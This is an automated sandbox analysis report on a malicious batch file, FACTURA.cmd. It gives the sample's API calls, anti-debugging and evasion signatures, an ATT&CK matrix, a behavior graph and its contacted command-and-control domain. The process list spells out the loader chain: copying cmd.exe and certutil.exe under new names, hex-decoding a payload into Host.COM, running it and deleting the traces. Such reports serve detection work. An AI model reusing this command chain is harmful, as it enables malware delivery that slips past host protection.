      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF793741560
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF7E087234C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF7E080C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF7E0876F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E08710C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF7E0873100
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF7E081B3D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF7E081D4A4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF7E07DD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF7E0853674
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08719F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7E08719F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF7E0871B04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF7E081DBC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF7E0815E58
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02DF5908
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF793741560
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF793741560
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF7E085511C
      Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
      Source: Host.COM, 00000009.00000002.3032889978.000000000084D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\Public\Libraries\Host.COMAPI call chain: ExitProcess graph end node

      Anti Debugging

      barindex
      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0F740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,9_2_02E0F740
      Source: C:\Users\Public\Libraries\Host.COMProcess queried: DebugPortJump to behavior
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937663FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF7937663FC
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02E08954
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937593B0 SetUnhandledExceptionFilter,3_2_00007FF7937593B0
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937593B0 SetUnhandledExceptionFilter,5_2_00007FF7937593B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08A4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7E08A4E18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08A53E0 SetUnhandledExceptionFilter,6_2_00007FF7E08A53E0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937593B0 SetUnhandledExceptionFilter,10_2_00007FF7937593B0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF793758FA4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937593B0 SetUnhandledExceptionFilter,11_2_00007FF7937593B0

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Drops or copies certutil.exe with a different name (likely to bypass HIPS)
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
      Drops or copies cmd.exe with a different name (likely to bypass HIPS)
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0857024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,6_2_00007FF7E0857024
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COMJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3 Jump to behavior
      Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10 Jump to behavior
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0844AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF7E0844AF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0854E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,6_2_00007FF7E0854E98
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,3_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,3_2_00007FF793753140
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF793753140
      Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,6_2_00007FF7E08A3800
      Source: C:\Users\Public\Libraries\Host.COMCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02DF5ACC
      Source: C:\Users\Public\Libraries\Host.COMCode function: GetLocaleInfoA,9_2_02DFA7CC
      Source: C:\Users\Public\Libraries\Host.COMCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02DF5BD8
      Source: C:\Users\Public\Libraries\Host.COMCode function: GetLocaleInfoA,9_2_02DFA818
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF793753140
      Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7937551EC
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF793753140
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793746EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF793746EE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F8944 GetComputerNameExW,GetLastError,#357,GetUserNameExW,GetLastError,#357,#357,#357,#357,#357,#357,6_2_00007FF7E07F8944
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79374586C GetVersion,3_2_00007FF79374586C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,6_2_00007FF7E07B227C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,6_2_00007FF7E07CE568
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,6_2_00007FF7E07B54A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,6_2_00007FF7E07D5648

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure2
      Valid Accounts      		1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		2
      Disable or Modify Tools      		OS Credential Dumping1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      Data Encrypted for Impact
      CredentialsDomainsDefault AccountsScheduled Task/Job2
      Valid Accounts      		2
      Valid Accounts      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop ProtocolData from Removable Media21
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)21
      Access Token Manipulation      		2
      Obfuscated Files or Information      		Security Account Manager1
      System Network Connections Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
      Process Injection      		1
      Install Root Certificate      		NTDS1
      File and Directory Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Timestomp      		LSA Secrets35
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials1
      Query Registry      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
      Masquerading      		DCSync331
      Security Software Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
      Valid Accounts      		Proc Filesystem1
      Virtualization/Sandbox Evasion      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Virtualization/Sandbox Evasion      		/etc/passwd and /etc/shadow1
      Application Window Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
      Access Token Manipulation      		Network Sniffing1
      System Owner/User Discovery      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
      Process Injection      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532879 Sample: FACTURA.cmd Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 35 taksonsdfg.co.in 2->35 39 Multi AV Scanner detection for domain / URL 2->39 41 Found malware configuration 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 6 other signatures 2->45 8 cmd.exe 1 2->8         started        signatures3 process4 process5 10 Host.COM 8->10         started        14 extrac32.exe 1 8->14         started        17 alpha.exe 1 8->17         started        19 5 other processes 8->19 dnsIp6 37 taksonsdfg.co.in 108.170.55.202, 443, 49730, 49731 SSASN2US United States 10->37 51 Multi AV Scanner detection for dropped file 10->51 53 Machine Learning detection for dropped file 10->53 55 Allocates many large memory junks 10->55 57 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 10->57 33 C:\Users\Public\alpha.exe, PE32+ 14->33 dropped 59 Drops PE files to the user root directory 14->59 61 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 14->61 63 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 14->63 21 kn.exe 3 2 17->21         started        24 kn.exe 2 19->24         started        27 extrac32.exe 1 19->27         started        file7 signatures8 process9 file10 47 Registers a new ROOT certificate 21->47 49 Drops PE files with a suspicious file extension 21->49 29 C:\Users\Public\Libraries\Host.COM, PE32 24->29 dropped 31 C:\Users\Public\kn.exe, PE32+ 27->31 dropped signatures11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      FACTURA.cmd33%ReversingLabsScript-BAT.Packed.Generic
      FACTURA.cmd35%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\Public\Libraries\Host.COM100%Joe Sandbox ML
      C:\Users\Public\Libraries\Host.COM51%VirustotalBrowse
      C:\Users\Public\alpha.exe0%ReversingLabs
      C:\Users\Public\alpha.exe0%VirustotalBrowse
      C:\Users\Public\kn.exe0%ReversingLabs
      C:\Users\Public\kn.exe0%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      taksonsdfg.co.in10%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://login.microsoftonline.com/%s/oauth2/authorize0%VirustotalBrowse
      https://login.microsoftonline.com/%s/oauth2/token0%VirustotalBrowse
      https://taksonsdfg.co.in/./5%VirustotalBrowse
      https://taksonsdfg.co.in/H0%VirustotalBrowse
      https://enterpriseregistration.windows.net/EnrollmentServer/key/0%VirustotalBrowse
      https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx11%VirustotalBrowse
      https://taksonsdfg.co.in/x10%VirustotalBrowse
      https://taksonsdfg.co.in/5%VirustotalBrowse
      https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah0%VirustotalBrowse
      https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc0%VirustotalBrowse
      http://www.pmail.com0%VirustotalBrowse
      https://enterpriseregistration.windows.net/EnrollmentServer/device/0%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      taksonsdfg.co.in
      		108.170.55.202
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxtrueunknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmpfalse
        		unknown
        https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalseunknown
        https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxV/K$Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmptrue
          		unknown
          https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx~Host.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrue
            		unknown
            https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalseunknown
            https://taksonsdfg.co.in/./Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmptrueunknown
            https://taksonsdfg.co.in/ZHost.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmptrue
              		unknown
              https://taksonsdfg.co.in/f/Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmptrue
                		unknown
